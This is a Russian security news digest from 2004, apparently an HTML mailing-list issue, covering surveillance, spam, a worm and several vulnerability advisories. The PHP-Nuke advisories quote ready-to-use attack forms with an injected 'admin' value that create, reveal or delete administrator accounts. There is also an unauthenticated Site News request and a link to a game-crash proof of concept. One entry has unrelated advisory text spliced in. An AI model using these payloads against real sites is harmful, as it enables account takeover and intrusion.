Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
<html >
<base />
<head>
<title>Информационная безопасность</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<div >
<div style="padding-top: 20 px; padding-bottom: 20px">
<style>
h2 {
font-family: Arial;
font-size: 18pt;
color: #404040;
font-weight: normal;
margin-bottom: 5px;
margin-top: 5px;
padding-left: 5px;
background-color1: #f0f0f0;
}
h1 {
font-family: Arial;
font-size: 22pt;
font-weight: normal;
margin-bottom: 5px;
margin-top: 5px;
}
h3 {font-family: Arial; font-size: 15pt; font-weight:normal; padding-top: 0px;
margin-top: 15px;
margin-bottom: 5px;}
body, p , td {
font-size: x-small;
font-family: Arial, Helvetica, sans-serif;
}
div.even {padding: 5px;padding-left: 15px;background-color: #ffffff}
div.odd { padding: 5px;padding-left: 15px; background-color: #fafafa }
hr {height: 1px; color: e0e0e0;}
.date { font-size: 80%; color: #999999}
a.p,a.p:visited {text-decoration: none; color: black}
a.p:hover {text-decoration: underline; color: #505050;}
a.h3,a.h3:visited {text-decoration: none; color: black}
a.h3:hover {text-decoration: underline; color: #777777;}
td.header2 {background-gcolor: #f7f7f7; border-left: 5px solid #669933 }
</style>
<style>
td.header2 {background-gcolor: white; border-left: 5px solid white}
h2 { font-family: Tahoma, Arial, Helvetica, sans-serif;
font-size: 16pt;
font-weight: normal;
color: #FFFFFF;
background-color1: #99cc00;
background-color: #801417;
padding: 3px;
margin-top: 10px; margin-bottom: 5px; }
.date {font-size: 8pt; color: gray}
</style>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="9%" bgcolor=#003B6F>
<table width="103%" border="0" cellspacing="0" cellpadding="0" height=70>
<tr><td width=16 height=16><img src="http://www.ekey.ru/i/lt-corn.gif" width=16 height=16></td>
</tr>
<tr >
<td width="16" ></td>
</tr>
<tr><td width=16 height=16><img src="http://www.ekey.ru/i/lb-corn.gif" width=16 height=16></td></tr>
</table>
</td>
<td bgcolor="#003B6F" height=70><font color="#FFFFFF" size=4>Новости информационной
безопасности</font>
</td>
<td bgcolor="#7f9db7" width=250 align=center >
<img src="http://stra.teg.ru/lenta/security/.mailheader/strtegsmall.gif" border=0 alt="Стратег.Ру" width="117" height="34"><br>
<font color=white size=-1>Ekey.ru <a href="http://www.ekey.ru"><font color=white>Удостоверяющий Центр</font></a>"</font>
</td>
<td width=20 bgcolor="#7f9db7" align=center>
<table width=14 border="0" cellspacing="0" cellpadding="0" height=70 align=right>
<tr>
<td width=14 valign=top height=14 bgcolor=white><img src="http://www.ekey.ru/i/rt-corn.gif" width=14 height=14></td>
</tr>
<tr><td width="14" ></td></tr>
<tr><td width=14 valign=bottom height=14 bgcolor=white><img src="http://www.ekey.ru/i/rb-corn.gif" width=14 height=14></td></tr>
</table>
</td>
</tr>
</table>
<br>
<span class=date>7.9.2004 - 7.9.2004</date>
</span>
<br>
</div>
<!-- base / -->
<h2>Содержание</h2>
<ul>
<li><a href="#topics_1">Исследования, открытия, лабораторные разработки</a>
<li><a href="#topics_2">Регулирование: Законы, постановления, сертификация, контроль</a>
<li><a href="#topics_3">Проблемные ситуации, информационная преступность, сетевые войны</a>
<li><a href="#topics_4">Технологии безопасности. Организации разработчики, интеграторы.</a>
<li><a href="#topics_10">Дыры и патчи программ и операционных сред</a>
</ul>
<br><a name="topics_1"></a>
<table width=100%><tr><td class=header2>
<h2>Исследования, открытия, лабораторные разработки</h2></td></tr></table>
<div class=even>
<h3><a href="http://stra.teg.ru/lenta/security/7906" target=_blank class=h3 style="text-decoration: none; color: black">В Москве установят системы видеонаблюдения с компьютерным зрением "Orwell 2k"</a></h3>
<span class=date>7 сентября | ROL </span><br>
<p>
<P>В Северо-Западном административном округе Москвы произведена инсталляция
системы видеонаблюдения с компьютерным зрением "Orwell 2k". Проект реализован в
рамках сотрудничества между НПЦ "Элвис" и НТЦ "Потенциал".
<P>"Orwell
2k" позволяет автоматически контролировать места массового скопления
людей, фиксировать события и предупреждать органы безопасности о нештатных
ситуациях. Функции видеонаблюдения и анализа ситуаций осуществляются компьютером
без участия человека.
<P>Система имеет возможность выделять из панорамного изображения интересующие
цели и события и автоматически наводить на них поворотную камеру для детального
просмотра, что позволяет не только фиксировать действия преступников, но и
определять очевидцев и свидетелей проишествий.
<P>Алгоритмы системы позволяют распознавать следующие ситуации:
<UL>
<LI>Оставленные автомобили и предметы
<LI>Многократные контакты человека
<LI>Нахождение человека в зоне контроля дольше заданного оператором времени
<LI>Передача предметов
<LI>Акты вандализма
<LI>Бегущий
человек
<LI>Упавший человек</LI></UL>
<P>Уже в первые дни по материалам видеозаписи автоматической поворотной камеры
"Orwell 2k" органами ГУВД Москвы было раскрыто убийство охранника и посетителя
зала игровых автоматов.
<P>Руководство СЗАО Москвы приняло решение оснастить такими комплексами пункты
экстренной связи с РОВД, создаваемые в школах и местах массового скопления
людей. </P>
</div odd>
<br><a name="topics_2"></a>
<table width=100%><tr><td class=header2>
<h2>Регулирование: Законы, постановления, сертификация, контроль</h2></td></tr></table>
<div class=even>
<h3><a href="http://stra.teg.ru/lenta/security/7903" target=_blank class=h3 style="text-decoration: none; color: black">Правительство КНР намерено бороться со спамерами</a></h3>
<span class=date>7 сентября | http://net.compulenta.ru/ </span><br>
<p>Количество мусорной рекламы составило более половины всех сообщений электронной
почты, полученных в Китае, <A
href="http://story.news.yahoo.com/news?tmpl=story&ncid=1212&e=3&u=/nm/20040906/wr_nm/tech_china_spam_dc&sid=95573503"
target=_blank>сообщает</A> агентство Reuters. Это побуждает правительство КНР
начать борьбу с нежелательными рассылками и принять закон против спама и
спамеров, помимо проводимой государственной кампании по очищению интернета от
порнографии. По данным софтверной фирмы Sophos, Китай является третьим по
величине рассыльщиком нежелательных сообщений после США и Южной Кореи. Эксперты
заявляют, что правительства и бизнес-круги по всему миру планируют потратить в
текущем году на защиту компьютерных систем от спама 41 млрд. долларов США.
Ожидается, что в мировом масштабе количество непрошенной рекламы к концу года
составит 67% от всей электронной почты.
</div odd>
<br><a name="topics_3"></a>
<table width=100%><tr><td class=header2>
<h2>Проблемные ситуации, информационная преступность, сетевые войны</h2></td></tr></table>
<div class=even>
<h3><a href="http://stra.teg.ru/lenta/security/7895" target=_blank class=h3 style="text-decoration: none; color: black">Червь MyWife запускает Windows Media Player</a></h3>
<span class=date>7 сентября | www.OXPAHA.ru </span><br>
<p>
<TR>
<TD></TD></TR>
<TR>
<TD colSpan=2>
<BLOCKQUOTE><FONT class=text9>
<P align=justify>Компания McAfee сообщает об обнаружении новой вредоносной
программы, получившей название MyWife. После проникновения
на компьютер с
Microsoft Windows этот червь размером 72874 запускает проигрыватель Media Player
и создает свои многочисленные копии в системной директории под различными
именами, например, PaltlkRoom.wav, Connection.exe или Life.jpg. Далее вирус
проверяет наличие на инфицированном компьютере приложения WinZIP. В случае
обнаружения такового вредоносная программа изменяет содержащуюся в реестре
регистрационную информацию о вышеназванном архиваторе, включая имя пользователя
и персональный ключ. Широкого распространения червь MyWife пока не получил.
Более подробное описание вируса можно найти на веб-сайте McAfee.
</P></FONT></BLOCKQUOTE></TD></TR>
<h3><a href="http://stra.teg.ru/lenta/security/7894"
target=_blank class=h3 style="text-decoration: none; color: black">В Интернете растет киберхулиганство</a></h3>
<span class=date>7 сентября | http://www.crime-research.ru/ </span><br>
<p>Согласно докладу юридического комитета Сената США от 1999 «Дети, насилие и СМИ»,
за последние 40 лет было проведено более чем 1000 исследований последствий
подачи насилия в средствах массовой информации. Хотя специальных исследований по
проблеме насилия в Интернете не проводилось, оно, вероятно, носит еще более
разрушительный характер, чем в программах телевидения. <BR><BR>Чаты, форумы
поддержки, мгновенные сообщения – начиная с эпохи зарождения
Интернета – одна из
сторон сетевой жизни, которая дает людям чувство общности. Но Интернет может
быть и опасным местом. В октябре 2002 года родители ребенка из Майами обратились
с заявлением в Национальный Совет по вопросам пропажи и эксплуатации детей:
мужчина, которого их дочь встретила через Интернет, звонил и посылал ей
электронные письма. Как выяснилось, ФБР уже занималось расследованием 71-летнего
мужчины, который общался в Сети со 150 разными детьми, и 8 из них уже стали его
жертвами. В феврале 2003 года он был арестован по 13 пунктам обвинительного акта
о приставании к детям, попыток приставания и попыток производства детской
порнографии. <BR><BR>В «Исследовании безопасности Интернета для молодого
поколения» говорится, что в течение 2002 года почти каждый пятый ребенок,
участвовавший в опросе, получал через
Интернет сообщения с сексуальными
приставаниями или их попытками. Фактически, эта практика настолько
распространена, что получила название – сайберинг – соблазнение разговорами с
незнакомцем в Сети на темы секса. Для одного из 33 опрошенных детей соблазнения
были расценены как агрессивные: соблазнитель просил о встрече, звонил по
телефону, регулярно посылал сообщения по электронной почте и т.д. <BR><BR>В
Интернете есть сайты, пропагандирующие расовую неприязнь, терроризм и ненависть.
В киберпространстве растет проблема, получившая новое имя: киберхулиганство.
Оскорбления происходят не только в Сети. Новым средством атаковать других людей
технически изощренными оскорблениями стали сотовые телефоны. Звонки с угрозами
или агрессивные текстовые сообщения беспрепятственно доходят до своих жертв.
<BR><BR>Особую тревогу
вызывает факт расширения масштабов и появления новых
способов совершения преступлений в сфере компьютерной информации, которые вышли
за рамки национальных законодательств. В связи с этим, в последнее время вопросы
защиты секретной и конфиденциальной компьютерной информации, прав субъектов,
участвующих в информационных процессах и информатизации, от преступных
посягательств стали острейшей международной и государственной проблемой. <BR>
</div odd>
<br><a name="topics_4"></a>
<table width=100%><tr><td class=header2>
<h2>Технологии безопасности. Организации разработчики, интеграторы.</h2></td></tr></table>
<div class=even>
<h3><a href="http://stra.teg.ru/lenta/security/7905" target=_blank class=h3 style="text-decoration: none; color: black">Межсетевой экран Outpost Firewall будет распространяться в Японии</a></h3>
<span class=date>7 сентября | http://security.compulenta.ru/ </span><br>
<p>Компания "Агнитум" <A href="http://www.agnitum.com/ru/"
target=_blank>объявила</A> о партнерстве с Canon System Solutions, ставшей
эксклюзивным дистрибьютором Outpost Firewall на территории Японии. Outpost будет
распространяться
в боксовой версии, которая будет продаваться через крупнейшую в
Японии дистрибьюторскую сеть SoftBank в онлайне, а также в тестовой версии
вместе с антивирусом NOD32. Outpost Firewall Pro является персональным
многофункциональным межсетевым экраном с открытой архитектурой, предназначенным
для домашнего и корпоративного пользования и предоставляющим защиту от хакерских
атак, вирусов, троянских программ и других вторжений из интернета.
</div odd>
<br><a name="topics_10"></a>
<table width=100%><tr><td class=header2>
<h2>Дыры и патчи программ и операционных сред</h2></td></tr></table>
<div class=even>
<h3><a href="http://stra.teg.ru/lenta/security/7904" target=_blank class=h3 style="text-decoration: none; color: black">Критические уязвимости в IBM DB2 Universal Database</a></h3>
<span class=date>7 сентября | http://security.compulenta.ru </span><br>
<p>
<P>Компания NGSSoftware предупреждает об обнаружении двух уязвимостей в
реляционной базе данных IBM DB2 Universal Database. Как <A
href="http://www.nextgenss.com/advisories/db2-01.txt"
target=_blank>сообщается</A>, дыры провоцируют
ошибки переполнения буфера и,
соответственно, могут использоваться злоумышленниками с целью выполнения
произвольного вредоносного кода на удаленном компьютере. Уязвимости,
представляющие критическую опасность, содержатся в DB2 Universal Database версий
7.х и 8.х. Впрочем, патчи для дыр уже выпущены, загрузить их можно <A
href="http://www-306.ibm.com/software/data/db2/udb/support/downloadv7.html"
target=_blank>отсюда</A> и <A
href="http://www-306.ibm.com/software/data/db2/udb/support/downloadv8.html"
target=_blank>отсюда</A>. Более детальную информацию о проблеме специалисты
NGSSoftware намерены обнародовать 1 декабря нынешнего года.</P>
<h3><a href="http://stra.teg.ru/lenta/security/7902"
target=_blank class=h3 style="text-decoration: none; color: black">Удаленное повышение привилегий в PHP-Nuke</a></h3>
<span class=date>7 сентября | SecurityLab.ru </span><br>
<p>
<TABLE cellSpacing=10 cellPadding=0 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<DIV class=artbody><STRONG>Программа: </STRONG>PHP-Nuke 7.4
<P><STRONG>Опасность: </STRONG>Высокая
<P><STRONG>Наличие эксплоита:</STRONG> Да
<P><STRONG>Описание: </STRONG>Уязвимость обнаружена в PHP-Nuke в 'admin.php'
сценарии. Удаленный пользователь может создать
учетную запись с
административными привилегиями.
<P>Удаленный пользователь может представить специально обработанный POST запрос
к 'admin.php', чтобы добавить учетную запись пользователя с административными
привилегиями: <PRE><form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME:
<input type="text" name="add_aid">
<br>
NOME:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input
type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
</PRE>
<P><STRONG>URL производителя</STRONG>:<A
href="http://www.phpnuke.org/">http://www.phpnuke.org/</A></P>
<P><STRONG>Решение:</STRONG>Способов устранения обнаруженной уязвимости не
существует в настоящее время. </P></DIV></TD></TR></TBODY></TABLE>
<P></P>
<TABLE cellSpacing=0 cellPadding=3 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<UL>
<LI><A href="47732.html">[XSS] PHP-Nuke 7.4 Remote Privilege Escalation</A>
</LI></UL></TD></TR></TBODY></TABLE>
<h3><a href="http://stra.teg.ru/lenta/security/7901" target=_blank class=h3 style="text-decoration: none; color: black">Локальный неавторизованный доступ в Site News</a></h3>
<span class=date>7 сентября | SecurityLab.ru </span><br>
<p>
<TABLE cellSpacing=10 cellPadding=0 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<DIV class=artbody><STRONG>Программа: </STRONG>Site News 1.1
<P><STRONG>Опасность: </STRONG>Низкая
<P><STRONG>Наличие эксплоита:</STRONG> Да
<P><STRONG>Описание: </STRONG>Уязвимость обнаружена в Site
News. Локальный
пользователь может добавлять или редактировать новости.
<P>Локальный пользователь может следующим образом добавлять или редактировать
сообщения, не авторизуясь в приложении: <PRE>sitenews.cgi?update\?oldsubject=OLD_SUBJ&subject=NEW_SUBJ&name=ANY_NAME&issue=ISSUE&message=MESSAGE
</PRE>
<P><STRONG>URL производителя</STRONG>:<A
href="http://www.utilmind.com/scripts/sitenews.html">
http://www.utilmind.com/scripts/sitenews.html </A></P>
<P><STRONG>Решение:</STRONG>Способов устранения обнаруженной уязвимости не
существует в настоящее время. </P></DIV></TD></TR></TBODY></TABLE>
<P></P>
<TABLE cellSpacing=0 cellPadding=3 width="100%" align=center border=0>
<TBODY>
<TR>
<TD
vAlign=top width="100%">
<UL>
<LI><A href="47738.html">Site News Authentication Error May Let Local Users Add
Messages </A></LI></UL></TD></TR></TBODY></TABLE>
<h3><a href="http://stra.teg.ru/lenta/security/7898" target=_blank class=h3 style="text-decoration: none; color: black">Несколько уязвимостей в PHP-Nuke</a></h3>
<span class=date>7 сентября | SecurityLab.ru </span><br>
<p>
<TABLE cellSpacing=10 cellPadding=0 width="100%" align=center
border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<DIV class=artbody><STRONG>Программа: </STRONG>PHP-Nuke 7.4
<P><STRONG>Опасность: </STRONG>Высокая
<P><STRONG>Наличие эксплоита:</STRONG> Да
<P><STRONG>Описание: </STRONG>Две уязвимости обнаружены в PHP-Nuke в обработке
некоторых административных команд. Удаленный пользователь может просматривать
информацию административной учетной записи и удалять административную учетную
запись.
<P>Удаленный пользователь может представить специально обработанный POST запрос,
чтобы просматривать ‘’aid’ значение административной учетной записи. Пример: <PRE>
<form name="form1" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<input type="hidden" name="admin"
value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="mod_authors">
<input type="submit" name="Submit" value="Display">
<br>
</p>
</form>
</PRE>Также удаленный пользователь может представить специально обработанный
POST запрос, чтобы удалить административную учетную запись. Пример: <PRE>
<form name="form1" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
USERNAME: <input type="text" name="del_aid">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="deladminconf">
<input type="submit" name="Submit" value="Delete Admin">
<br>
</p>
</form>
</PRE>
<P><STRONG>URL производителя</STRONG>:<A href="http://www.phpnuke.org/">
http://www.phpnuke.org/ </A></P>
<P><STRONG>Решение:</STRONG> Добавьте этот код в admin.php: <PRE>if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}
if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}
</PRE></DIV></TD></TR></TBODY></TABLE>
<P></P>
<TABLE cellSpacing=0 cellPadding=3 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<UL>
<LI><A href="47733.html">[XSS] PHP-Nuke 7.4 ViewAdmin Bug</A>
</LI></UL></TD></TR></TBODY></TABLE>
<h3><a href="http://stra.teg.ru/lenta/security/7899" target=_blank class=h3 style="text-decoration: none; color: black">Удаленный отказ в обслуживании в StorageTek Disk Systems</a></h3>
<span class=date>7 сентября | SecurityLab.ru </span><br>
<p>
<TABLE cellSpacing=10 cellPadding=0 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<DIV class=artbody><STRONG>Программа: </STRONG>StorageTek Disk Systems D280
<P><STRONG>Опасность: </STRONG>Средняя
<P><STRONG>Наличие эксплоита:</STRONG> Нет
<P><STRONG>Описание: </STRONG>Отказ в обслуживании обнаружен в Engenio storage
controllers, включая StorageTek D280 и потенциально другие StorageTek дисковые
системы. Удаленный пользователь может аварийно завершить работу устройства.
<P>Удаленный пользователь может послать несколько
специально обработанный TCP
пакетов, чтобы аварийно завершить работу устройства. В некоторых случаях,
возможно повреждение данных. Журнал системных событий не регистрирует нападение.
Уязвимость расположена в VxWorks (встроенная операционная система, используемая
в StorageTek продуктах).
<P><STRONG>URL производителя</STRONG>:<A
href="http://www.storagetek.com/products/disk_storage.html">
http://www.storagetek.com/products/disk_storage.html</A></P>
<P><STRONG>Решение:</STRONG>Способов устранения обнаруженной уязвимости не
существует в настоящее время. </P></DIV></TD></TR></TBODY></TABLE>
<P></P>
<TABLE cellSpacing=0 cellPadding=3 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<UL>
<LI><A
href="47734.html">[Full-Disclosure] Engenio/LSI Logic controllers denial
of service/data corruption</A> </LI></UL></TD></TR></TBODY></TABLE>
<h3><a href="http://stra.teg.ru/lenta/security/7900" target=_blank class=h3 style="text-decoration: none; color: black">Удаленный отказ в обслуживании в IBM Disk Systems FAStT</a></h3>
<span class=date>7 сентября | SecurityLab.ru </span><br>
<p>
<TABLE cellSpacing=10 cellPadding=0 width="100%" align=center border=0>
<TBODY>
<TR>
<TD
vAlign=top width="100%">
<DIV class=artbody><STRONG>Программа: </STRONG>IBM Disk Systems FAStT 100
<P><STRONG>Опасность: </STRONG>Средняя
<P><STRONG>Наличие эксплоита:</STRONG> Нет
<P><STRONG>Описание: </STRONG>Отказ в обслуживании обнаружен в продуктах,
использующих Engenio storage controllers, включая IBM FAStT 100 и потенциально
другие IBM дисковые системы. Удаленный пользователь может аварийно завершить
работу устройства.
<P>Удаленный пользователь может послать несколько специально обработанный TCP
пакетов, чтобы аварийно завершить работу устройства. В некоторых случаях,
возможно повреждение данных. Журнал системных событий не регистрирует нападение.
<P><STRONG>URL производителя</STRONG>:<A
href="http://www.ibm.com/servers/storage/disk/index.html">http://www.ibm.com/servers/storage/disk/index.html
</A></P>
<P><STRONG>Решение:</STRONG>Способов устранения обнаруженной уязвимости не
существует в настоящее время. </P></DIV></TD></TR></TBODY></TABLE>
<P></P>
<TABLE cellSpacing=0 cellPadding=3 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<UL>
<LI><A href="47735.html">[Full-Disclosure] Engenio/LSI Logic controllers denial
of service/data corruption</A> </LI></UL></TD></TR></TBODY></TABLE>
<h3><a href="http://stra.teg.ru/lenta/security/7896" target=_blank class=h3 style="text-decoration: none; color: black">Удаленный отказ в обслуживании в Brocade</a></h3>
<span class=date>7 сентября | SecurityLab.ru </span><br>
<p>
<TABLE cellSpacing=10 cellPadding=0 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<DIV class=artbody><STRONG>Программа: </STRONG>Brocade до 3.2
<P><STRONG>Опасность: </STRONG>
<P><STRONG>Наличие эксплоита:</STRONG> Нет
<P><STRONG>Описание: </STRONG>Отказ в обслуживании обнаружен в продуктах,
использующих Engenio storage controllers, включая Brocade коммутаторы. Удаленный
пользователь может аварийно завершить работу устройства.
<P><STRONG>URL производителя</STRONG>:<A
href="http://www.brocade.com/products/switches.jsp">http://www.brocade.com/products/switches.jsp
</A></P>
<P><STRONG>Решение:</STRONG>Установите обновление (firmware 1.2)
<STRONG>Программа: </STRONG>Call of Duty Game 1.4 и более ранние версии
<P><STRONG>Опасность: </STRONG>Средняя
<P><STRONG>Наличие эксплоита:</STRONG> Да
<P><STRONG>Описание: </STRONG>Уязвимость обнаружена в Call of Duty. Удаленный
пользователь может завершить работу игрового сервера.
</P></DIV></TD></TR></TBODY></TABLE>
<P></P>
<TABLE
cellSpacing=0 cellPadding=3 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<UL>
<LI><A href="47736.html">[Full-Disclosure] Engenio/LSI Logic controllers denial
of service/data corruption</A> </LI></UL></TD></TR></TBODY></TABLE>
<h3><a href="http://stra.teg.ru/lenta/security/7897" target=_blank class=h3 style="text-decoration: none; color: black">Удаленный отказ в обслуживании в Call of Duty Game</a></h3>
<span class=date>7 сентября | SecurityLab.ru </span><br>
<p>
<TABLE cellSpacing=10 cellPadding=0 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<DIV class=artbody><STRONG>Программа: </STRONG>Call of Duty Game 1.4 и более
ранние версии
<P><STRONG>Опасность: </STRONG>Средняя
<P><STRONG>Наличие эксплоита:</STRONG> Да
<P><STRONG>Описание: </STRONG>Уязвимость обнаружена в Call of Duty. Удаленный
пользователь может завершить работу игрового сервера.
<P>Удаленный пользователь может послать запрос или ответ длиной более 1024
символов, чтобы аварийно завершить работу игры из-за переполнения буфера в игре.
Уязвима клиентская и серверная часть игры
<P><STRONG>Пример/Эксплоит: </STRONG><A
href="http://aluigi.altervista.org/poc/codboom.zip">http://aluigi.altervista.org/poc/codboom.zip
</A>
<P><STRONG>URL производителя</STRONG>:<A
href="http://www.infinityward.com/">http://www.infinityward.com/ </A></P>
<P><STRONG>Решение:</STRONG>Неофициально исправление доступно тут: <A
href="http://aluigi.altervista.org/patches/cod-"
14-fix.zip>http://aluigi.altervista.org/patches/cod- 14-fix.zip</A>
</P></DIV></TD></TR></TBODY></TABLE>
<P></P>
<TABLE cellSpacing=0 cellPadding=3 width="100%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top width="100%">
<UL>
<LI><A href="47737.html">Broadcast shutdown in Call of Duty 1.4</A>
</LI></UL></TD></TR></TBODY></TABLE>
</div odd>
<br>
<br>
<hr>
<font color=#999999>
Инструменты управления содержанием <a href="http://metod.ru/" class=p target="_blank">Метод.ру</a>
<br>
<font size=-2>Дата создания документа: 19:14 07.09.04</font>
</font>
</body>
</html>
http://subscribe.ru/
http://subscribe.ru/feedback/ |
Подписан адрес: Код этой рассылки: inet.safety.cybersecurity |
Отписаться |
В избранное | ||